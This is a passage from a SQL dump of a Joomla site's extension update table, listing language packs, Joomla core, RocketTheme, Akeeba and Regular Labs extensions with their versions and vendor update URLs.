Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(14596,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(14597,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(14598,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(14599,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(14600,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(14601,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(14602,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(14603,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(14604,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(14605,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(14606,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(14607,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(14608,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(14609,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(14610,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(14611,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(14612,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(14613,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14614,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(14615,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(14616,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(14617,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(14618,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(14619,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(14620,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(14621,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(14622,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(14623,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(14624,57,0,'French','','pkg_fr-FR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(14625,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(14626,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(14627,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(14628,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(14629,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(14630,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(14631,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(14632,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(14633,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(14634,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(14635,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(14636,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(14637,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(14638,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(14639,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(14640,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(14641,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(14642,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(14643,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(14644,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(14645,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(14646,57,0,'English US','','pkg_en-US','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(14647,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(14648,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(14649,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(14650,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(14651,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(14652,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(14653,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(14654,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(14655,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(14656,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(14657,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(14658,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(14659,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(14660,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(14661,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(14662,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(14663,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(14664,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(14665,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(14666,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(14667,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(14668,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(14669,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(14670,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.11','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-11.html\n				',''),(14671,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(14672,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.3','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-3.html\n				',''),(14673,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14674,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14675,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14676,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(14677,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14678,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14679,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14680,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14681,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(14682,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14683,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14684,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(14685,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(14686,3,0,'French','','pkg_fr-FR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(14687,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(14688,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(14689,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(14690,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(14691,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(14692,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(14693,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(14694,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(14695,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(14696,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(14697,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(14698,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(14699,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(14700,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(14701,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(14702,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(14703,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(14704,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(14705,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(14706,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(14707,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(14708,3,0,'English US','','pkg_en-US','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(14709,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(14710,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(14711,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(14712,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(14713,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(14714,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(14715,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(14716,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(14717,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(14718,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(14719,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(14720,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(14721,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(14722,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(14723,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(14724,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(14725,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(14726,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(14727,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(14728,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(14729,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(14730,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(14731,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(14732,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14733,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(14734,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(14735,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(14736,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(14737,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(14738,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(14739,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(14740,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(14741,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(14742,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(14743,57,0,'French','','pkg_fr-FR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(14744,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(14745,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(14746,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(14747,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(14748,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(14749,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(14750,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(14751,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(14752,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(14753,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(14754,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(14755,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(14756,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(14757,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(14758,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(14759,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(14760,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(14761,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(14762,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(14763,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(14764,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(14765,57,0,'English US','','pkg_en-US','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(14766,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(14767,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(14768,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(14769,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(14770,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(14771,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(14772,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(14773,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(14774,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(14775,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(14776,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(14777,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(14778,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(14779,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(14780,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(14781,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(14782,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(14783,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(14784,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(14785,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(14786,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(14787,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(14788,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(14789,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(14790,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.11','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-11.html\n				',''),(14791,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(14792,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.3','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-3.html\n				',''),(14793,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14794,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(14795,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14796,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14797,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14798,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14799,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(14800,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14801,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14802,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14803,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(14804,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(14805,3,0,'French','','pkg_fr-FR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(14806,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(14807,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(14808,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ja-JP